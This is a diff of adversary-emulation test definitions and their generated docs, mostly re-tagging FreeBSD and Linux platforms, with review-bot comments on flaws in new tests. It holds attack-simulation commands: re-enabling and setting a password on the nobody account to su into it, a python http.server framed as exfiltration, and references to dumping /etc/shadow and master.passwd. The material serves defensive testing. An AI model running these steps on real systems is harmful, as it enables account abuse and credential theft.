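Review bot: "Reactivate a locked/expired account (FreeBSD)" repeats the `pw mod user testuser1 -h 0` mistake from the previous hunk (the account created is `art`), and `pw usermod art -e +1d` sets the expiry one day in the future, so the account is not expired when `su art` runs even though the description says that `su` should fail at that point; use a past date for the expiry step. Two smaller points: `pw usermod` and `pw user mod` are mixed in the same command block, and `auto_generated_guid` is single-quoted here while every other guid on the page is bare. The platform list again says `- linux` for a `pw`/`rmuser` test, and "a inactive account" should read "an inactive account".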
@@ -76660,6 +79301,26 @@ initial-access:
|
||||
nobody\nsu nobody\nwhoami\nexit\n"
|
||||
cleanup_command: "chsh --shell /usr/sbin/nologin nobody\ncat /etc/passwd |grep
|
||||
nobody \n# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n"
|
||||
- name: Login as nobody (freebsd)
|
||||
auto_generated_guid: 16f6374f-7600-459a-9b16-6a88fd96d310
|
||||
description: 'An adversary may try to re-purpose a system account to appear
|
||||
legitimate. In this test change the login shell of the nobody account, change
|
||||
its password to nobody, su to nobody, exit, then reset nobody''s shell to
|
||||
/usr/sbin/nologin.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:Unprivileged
|
||||
user:/nonexistent:/usr/sbin/nologin\npw usermod nobody -s /bin/sh\necho
|
||||
$(openssl passwd -1 art) | pw mod user nobody -h 0\nsu nobody\nwhoami\nexit\n"
|
||||
cleanup_command: |
|
||||
pw usermod nobody -s /usr/sbin/nologin
|
||||
cat /etc/passwd |grep nobody
|
||||
# -> nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
|
||||
exfiltration:
|
||||
T1567:
|
||||
technique:
|
||||
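Review bot: the description of "Login as nobody (freebsd)" says the test changes the password of `nobody` to `nobody`, but the executor pipes `openssl passwd -1 art` into `pw mod user nobody -h 0`, so the password actually set is `art`; make the description and the command agree. The test name uses lower-case "(freebsd)" while the surrounding tests use "(FreeBSD)", and `supported_platforms` lists `- linux` for a `pw`-based test that should say `- freebsd`.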
@@ -77126,7 +79787,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
input_file:
|
||||
description: Test file to upload
|
||||
@@ -77283,7 +79943,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
domain:
|
||||
description: target SSH domain
|
||||
@@ -77305,7 +79964,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
user_name:
|
||||
description: username for domain
|
||||
@@ -77565,7 +80223,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
file_name:
|
||||
description: File name
|
||||
@@ -77849,7 +80506,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
executor:
|
||||
steps: |
|
||||
1. Victim System Configuration:
|
||||
@@ -77872,7 +80528,6 @@ exfiltration:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
steps: "1. On the adversary machine run the below command.\n\n tshark -f
|
||||
@@ -77900,4 +80555,21 @@ exfiltration:
|
||||
command: 'if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090
|
||||
& PID=$!; sleep 10; kill $PID; unset PID; fi
|
||||
|
||||
'
|
||||
- name: Python3 http.server (freebsd)
|
||||
auto_generated_guid: 57a303a2-0bc6-400d-b144-4f3292920a0b
|
||||
description: 'An adversary may use the python3 standard library module http.server
|
||||
to exfiltrate data. This test checks if python3.9 is available and if so,
|
||||
creates a HTTP server on port 9090, captures the PID, sleeps for 10 seconds,
|
||||
then kills the PID and unsets the $PID variable.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: 'if [ $(which python3.9) ]; then cd /tmp; python3.9 -m http.server
|
||||
9090 & PID=$!; sleep 10; kill $PID; unset PID; fi
|
||||
|
||||
'
|
||||
|
||||
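Review bot: "Python3 http.server (freebsd)" hard-codes `python3.9` in both the existence check and the invocation (`if [ $(which python3.9) ]; then cd /tmp; python3.9 -m http.server`), so the test silently does nothing on any host whose interpreter is a different 3.x; the Linux variant directly above uses `python3`, and `command -v python3` would work on FreeBSD as well. `$(which python3.9)` is also unquoted inside `[ ]`, which makes the test expression empty rather than false when the binary is absent. As with the other new FreeBSD tests, `supported_platforms` says `- linux` and should say `- freebsd`.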
@@ -829,9 +829,8 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
numeric_mode:
|
||||
description: Specified numeric mode value
|
||||
@@ -853,9 +852,8 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
symbolic_mode:
|
||||
description: Specified symbolic mode value
|
||||
@@ -877,9 +875,8 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
numeric_mode:
|
||||
description: Specified numeric mode value
|
||||
@@ -901,9 +898,8 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
symbolic_mode:
|
||||
description: Specified symbolic mode value
|
||||
@@ -978,9 +974,8 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
owner:
|
||||
description: Username of desired owner
|
||||
@@ -2329,7 +2324,6 @@ defense-evasion:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
test_message:
|
||||
description: Test message to echo out to the screen
|
||||
@@ -4480,7 +4474,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -4518,7 +4511,6 @@ defense-evasion:
|
||||
description: "Use Perl to decode a base64-encoded text string and echo it to
|
||||
the console \n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -4586,7 +4578,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -5449,7 +5440,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -5481,7 +5471,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -5516,7 +5505,6 @@ defense-evasion:
|
||||
Setting the creation timestamp requires changing the system clock and reverting.
|
||||
Sudo or root privileges are required to change date. Use with caution.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -5543,7 +5531,6 @@ defense-evasion:
|
||||
|
||||
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -7190,9 +7177,8 @@ defense-evasion:
|
||||
|
||||
Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
file_to_pad:
|
||||
description: Path of binary to be padded
|
||||
@@ -7225,9 +7211,8 @@ defense-evasion:
|
||||
|
||||
Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
file_to_pad:
|
||||
description: Path of binary to be padded
|
||||
@@ -13976,7 +13961,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -14008,7 +13992,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -14039,7 +14022,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -15686,7 +15668,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -15724,7 +15705,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -17093,7 +17073,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -20447,9 +20426,8 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
@@ -29881,9 +29859,8 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
@@ -32038,7 +32015,6 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -32063,7 +32039,6 @@ execution:
|
||||
|
||||
Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -35452,9 +35427,8 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
@@ -36503,7 +36477,6 @@ persistence:
|
||||
description: Turn on Chrome/Chromium developer mode and Load Extension found
|
||||
in the src directory
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- windows
|
||||
- macos
|
||||
@@ -36521,7 +36494,6 @@ persistence:
|
||||
auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f
|
||||
description: Install the "Minimum Viable Malicious Extension" Chrome extension
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- windows
|
||||
- macos
|
||||
@@ -36538,7 +36510,6 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- windows
|
||||
- macos
|
||||
@@ -39368,9 +39339,8 @@ persistence:
|
||||
persistence on victim host. \nIf the user is able to save the same contents
|
||||
in the authorized_keys file, it shows user can modify the file.\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
@@ -48279,7 +48249,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -48860,7 +48829,6 @@ command-and-control:
|
||||
This test simulates an infected host beaconing to command and control.
|
||||
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -48949,7 +48917,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -48989,7 +48956,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -49028,7 +48994,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -49059,7 +49024,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -49090,7 +49054,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -49121,7 +49084,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -49152,7 +49114,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -49342,9 +49303,8 @@ command-and-control:
|
||||
|
||||
Note that this test may conflict with pre-existing system configuration.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
proxy_server:
|
||||
description: Proxy server URL (host:port)
|
||||
@@ -49703,7 +49663,6 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -49733,7 +49692,6 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -49770,9 +49728,8 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
test_folder:
|
||||
description: Path used to store files.
|
||||
@@ -57401,9 +57358,8 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
search_path:
|
||||
description: Path where to start searching from.
|
||||
@@ -58320,7 +58276,6 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
input_arguments:
|
||||
@@ -58350,9 +58305,8 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
file_path:
|
||||
description: Path to search
|
||||
@@ -58370,9 +58324,8 @@ credential-access:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
file_path:
|
||||
description: Path to search
|
||||
@@ -60879,7 +60832,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will stdout list of usernames.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -61419,7 +61371,6 @@ discovery:
|
||||
auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2
|
||||
description: "(requires root)\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -61443,7 +61394,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -61466,7 +61416,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -61491,7 +61440,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -62144,7 +62092,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -62169,7 +62116,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -62184,9 +62130,8 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: 'env
|
||||
|
||||
@@ -63010,9 +62955,8 @@ discovery:
|
||||
|
||||
https://perishablepress.com/list-files-folders-recursively-terminal/
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Output file used to store the results.
|
||||
@@ -63038,9 +62982,8 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Output file used to store the results.
|
||||
@@ -63143,7 +63086,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
dependency_executor_name: sh
|
||||
@@ -63427,7 +63369,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will execute ps and output to /tmp/loot.txt.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -63579,9 +63520,8 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: |
|
||||
if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi;
|
||||
@@ -64099,7 +64039,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
dependency_executor_name: sh
|
||||
@@ -64125,7 +64064,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -64559,7 +64497,7 @@ discovery:
|
||||
description: "Identify system time. Upon execution, the local computer system
|
||||
time and timezone will be displayed. \n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: 'date
|
||||
@@ -71126,9 +71064,8 @@ impact:
|
||||
This test simulates a high CPU load as you might observe during cryptojacking attacks.
|
||||
End the test by using CTRL/CMD+C to break.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: 'yes > /dev/null
|
||||
|
||||
@@ -71291,7 +71228,6 @@ impact:
|
||||
Overwrites and deletes a file using DD.
|
||||
To stop the test, break the command with CTRL/CMD+C.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -71690,9 +71626,8 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
timeout:
|
||||
description: Time to restart (can be minutes or specific time)
|
||||
@@ -71710,9 +71645,8 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
timeout:
|
||||
description: Time to shutdown (can be minutes or specific time)
|
||||
@@ -71730,9 +71664,8 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: 'reboot
|
||||
|
||||
@@ -73844,7 +73777,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
input_file:
|
||||
description: Test file to upload
|
||||
@@ -74001,7 +73933,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
domain:
|
||||
description: target SSH domain
|
||||
@@ -74023,7 +73954,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
user_name:
|
||||
description: username for domain
|
||||
@@ -74283,7 +74213,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
file_name:
|
||||
description: File name
|
||||
@@ -74567,7 +74496,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
executor:
|
||||
steps: |
|
||||
1. Victim System Configuration:
|
||||
|
||||
@@ -51018,7 +51018,6 @@ persistence:
|
||||
description: Turn on Chrome/Chromium developer mode and Load Extension found
|
||||
in the src directory
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- windows
|
||||
- macos
|
||||
@@ -51036,7 +51035,6 @@ persistence:
|
||||
auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f
|
||||
description: Install the "Minimum Viable Malicious Extension" Chrome extension
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- windows
|
||||
- macos
|
||||
@@ -51053,7 +51051,6 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- windows
|
||||
- macos
|
||||
|
||||
@@ -85,7 +85,7 @@ Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities
|
||||
copy process memory to an external file so it can be searched or exfiltrated later.
|
||||
On FreeBSD procfs must be mounted.
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** fa37b633-e097-4415-b2b8-c5bf4c86e423
|
||||
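Review bot: the generated markdown renders the platform as `**Supported Platforms:** Freebsd`, which is the raw `freebsd` key with its first letter upper-cased; the project name is FreeBSD, so the documentation generator's platform display names need a `freebsd` to `FreeBSD` mapping (the same way `macos` renders as `macOS` in the hunks further down) before these docs are regenerated.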
@@ -146,7 +146,7 @@ Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script
|
||||
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
|
||||
On FreeBSD procfs must be mounted.
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 437b2003-a20d-4ed8-834c-4964f24eec63
|
||||
|
||||
@@ -55,7 +55,7 @@ atomic_tests:
|
||||
copy process memory to an external file so it can be searched or exfiltrated later.
|
||||
On FreeBSD procfs must be mounted.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
|
||||
input_arguments:
|
||||
output_file:
|
||||
@@ -102,7 +102,6 @@ atomic_tests:
|
||||
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
|
||||
On FreeBSD procfs must be mounted.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
|
||||
input_arguments:
|
||||
|
||||
@@ -61,7 +61,7 @@ rm -f #{output_file}
|
||||
## Atomic Test #2 - Access /etc/master.passwd (Local)
|
||||
/etc/master.passwd file is accessed in FreeBSD environments
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 5076874f-a8e6-4077-8ace-9e5ab54114a5
|
||||
@@ -99,7 +99,7 @@ rm -f #{output_file}
|
||||
## Atomic Test #3 - Access /etc/passwd (Local)
|
||||
/etc/passwd file is accessed in FreeBSD and Linux environments
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 60e860b6-8ae6-49db-ad07-5e73edd88f5d
|
||||
@@ -137,7 +137,7 @@ rm -f #{output_file}
|
||||
## Atomic Test #4 - Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat
|
||||
Dump /etc/passwd, /etc/master.passwd and /etc/shadow using ed
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** df1a55ae-019d-4120-bc35-94f4bc5c4b0a
|
||||
@@ -174,7 +174,7 @@ rm -f #{output_file}
|
||||
## Atomic Test #5 - Access /etc/{shadow,passwd,master.passwd} with shell builtins
|
||||
Dump /etc/passwd, /etc/master.passwd and /etc/shadow using sh builtins
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** f5aa6543-6cb2-4fae-b9c2-b96e14721713
|
||||
|
||||
@@ -25,7 +25,7 @@ atomic_tests:
|
||||
description: |
|
||||
/etc/master.passwd file is accessed in FreeBSD environments
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Path where captured results will be placed
|
||||
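Review bot: this is a 7-to-7 hunk, so one of the two `supported_platforms` lines (`- freebsd`, `- linux`) replaces the other; `/etc/master.passwd` exists only on FreeBSD, as the description itself states, so the merged result must keep `- freebsd` and not `- linux`. The same applies to the corresponding markdown hunk for "Atomic Test #2 - Access /etc/master.passwd (Local)" above.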
@@ -44,7 +44,6 @@ atomic_tests:
|
||||
description: |
|
||||
/etc/passwd file is accessed in FreeBSD and Linux environments
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
@@ -63,7 +62,6 @@ atomic_tests:
|
||||
description: |
|
||||
Dump /etc/passwd, /etc/master.passwd and /etc/shadow using ed
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
@@ -82,7 +80,6 @@ atomic_tests:
|
||||
description: |
|
||||
Dump /etc/passwd, /etc/master.passwd and /etc/shadow using sh builtins
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
|
||||
@@ -119,7 +119,7 @@ systemctl --type=service
|
||||
## Atomic Test #4 - System Service Discovery - service
|
||||
Enumerates system service using service
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** b2e1c734-7336-40f9-b970-b04731cbaf8a
|
||||
|
||||
@@ -50,7 +50,7 @@ atomic_tests:
|
||||
description: |
|
||||
Enumerates system service using service
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
service -e
|
||||
|
||||
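Review bot: "System Service Discovery - service" runs `service -e`, and `-e` (list enabled rc scripts) is the FreeBSD `service(8)` option; this hunk is 7-to-7, so `- freebsd` and `- linux` are being swapped for each other, and the merged result should keep `- freebsd` so the command matches the platform it is declared for. The corresponding markdown hunk for "Atomic Test #4 - System Service Discovery - service" needs the same outcome.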
@@ -145,7 +145,7 @@ Identify network configuration information.

Upon successful execution, sh will spawn multiple commands and output will be via stdout.

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** 7625b978-4efd-47de-8744-add270374bee

@@ -60,7 +60,7 @@ atomic_tests:

Upon successful execution, sh will spawn multiple commands and output will be via stdout.
supported_platforms:
- freebsd
- linux
executor:
command: |
if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi;

@@ -222,7 +222,7 @@ Identify remote systems via arp.

Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.

**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** acb6b1ff-e2ad-4d64-806c-6c35fe73b951
@@ -264,7 +264,7 @@ Identify remote systems via ping sweep.

Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.

**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** 96db2632-8417-4dbb-b8bb-a8b92ba391de
@@ -565,7 +565,7 @@ apt-get install iproute2 -y
## Atomic Test #14 - Remote System Discovery - netstat
Use the netstat command to display the kernels routing tables.

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** d2791d72-b67f-4615-814f-ec824a91f514

